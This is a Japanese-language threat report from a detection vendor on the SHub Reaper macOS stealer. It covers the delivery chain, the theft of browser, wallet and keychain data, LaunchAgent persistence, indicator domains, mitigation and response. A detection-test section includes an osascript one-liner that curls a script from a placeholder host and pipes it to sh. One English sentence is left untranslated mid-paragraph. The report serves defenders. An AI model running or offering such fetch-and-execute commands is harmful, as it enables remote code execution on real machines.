SOC Prime Bias: 中程度

20 May 2026 22:15 UTC

SHub Reaper | macOS スティーラーによるApple、Google、Microsoftを一度に偽装する攻撃チェーン

Author Photo
SOC Prime Team linkedin icon フォローする
SHub Reaper | macOS スティーラーによるApple、Google、Microsoftを一度に偽装する攻撃チェーン
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

サマリー

このレポートは、SHub Reaperと呼ばれる新しいmacOS情報スティーラーのバリアントを分析しており、タイポスクワットされたMicrosoftをテーマにしたドメインを通じて悪意のあるAppleScriptペイロードを配信するために偽のWeChatおよびMiroインストーラを使用しています。Script Editorで起動されると、ペイロードはブラウザーデータ、暗号通貨ウォレットファイル、キーチェーン情報を収集し、ストールンコンテンツをチャンク化されたZIPアーカイブとして流出させます。マルウェアはまた、ウォレットファイルをいじり、Googleソフトウェアのアップデートに偽装したLaunchAgentを通じて持続性を確立します。推奨される検出は、AppleScriptの実行、疑わしいLaunchAgentの作成、および既知のコマンド&コントロールインフラストラクチャへのアウトバウンドトラフィックに焦点を当てています。

調査

SentinelOneは、悪用された applescript:// スキーム、AppleScriptペイロードの動的生成、およびAMOSで見られるドキュメント盗難行為を反映したファイルグラビングモジュールを含むフルマルチステージ配信チェーンを追跡しました。研究者は、コマンド&コントロールドメインへのネットワークトラフィックをキャプチャしました hebsbsbzjsjshduxbs.xyz および関連するエンドポイントに加え、ユーザーのライブラリディレクトリに配置された一時ファイル及びLaunchAgentの作成を発見しました。この調査では、オペレーターのテレメトリーに使用されるハードコーディングされたTelegramボットの機能も明らかにされました。 /tmp and a LaunchAgent placed in the user’s Library directory. The investigation also uncovered hard-coded Telegram bot functionality used for operator telemetry.

緩和策

防御者は、タイポスクワットされたドメイン mlcrosoft.co.com, qq-0732gwh22.com、そして mlroweb.comへのアクセスをブロックし、Googleのアップデートコンポーネントを模したパスに作成されたLaunchAgentを監視すべきです。アプリケーションの許可リストを使用して、信頼されていないソースからのAppleScriptの実行を制限し、厳格なコード署名検証を実施する必要があります。ネットワーク検出も、特定のコマンド&コントロールドメインおよびその既知のAPIパスとの通信に警告を出すべきです。

レスポンス

SHub Reaperの活動が検出された場合、影響を受けるエンドポイントを直ちに隔離し、疑わしいAppleScriptまたはLaunchAgentプロセスを終了し、から悪意のあるファイルを削除します /tmp およびユーザーライブラリ。その後、調査者はブラウザーデータストア、ウォレットディレクトリ、およびクレデンシャルリポジトリの完全なフォレンジックコレクションを行い、妥協が疑われる場合はクレデンシャルのリセットを行います。特定されたコマンド&コントロールインフラはブロックされ、インシデントレスポンステームは環境全体でより広範囲な脅威ハンティングを開始すべきです。

攻撃フロー

シミュレーション実行

前提条件: テレメトリーおよびベースライン事前飛行チェックが合格していること。

根拠: このセクションは、検出ルールを起動するためにデザインされた敵対者技術(TTP)の正確な実行を詳述しています。コマンドとナラティブはTTPに直接反映され、検出ロジックが期待する正確なテレメトリーを生成することを目的としています。抽象的または無関係な例は誤診を引き起こします。

  • 攻撃概要とコマンド:
    攻撃者は一行で osascript を利用してシェルコマンドを実行する一行のスクリプトを作成。AppleScript内で シェルスクリプトを実行 として使用します curl はリモートシェルスクリプト(payload.sh)をダウンロードし、それを直接 sh にパイプして実行します。AppleScript呼び出し全体が単一の中に埋め込まれているため、macOSは単一の プロセス生成 イベントとして記録し、そのコマンドラインには osascript and curlが含まれており、検出ルールを満たしている。

  • 回帰テストスクリプト:

    #!/bin/bash
    #
    # macOSでSHub Reaperの実行をシミュレート
    # 'osascript'と'curl'を両方含む単一のプロセス生成イベントを生成
    #
    MALICIOUS_URL="https://malicious.example.com/payload.sh"
    
    # ワンライナー: osascriptがペイロードをcurlして実行するシェルコマンドを実行
    osascript -e "do shell script "curl -s ${MALICIOUS_URL} | sh""
  • クリーンアップコマンド:

    #!/bin/bash
    #
    # シミュレーションで作成されたアーティファクトをクリーンアップ。
    # ペイロードはメモリ上で実行され、ファイルを書き込みませんが、残存プロセスがないようにします。
    #
    # テストにより開始された 'sh' プロセスを終了(本番システムでの使用には注意)
    pkill -f "sh -c curl -s https://malicious.example.com/payload.sh"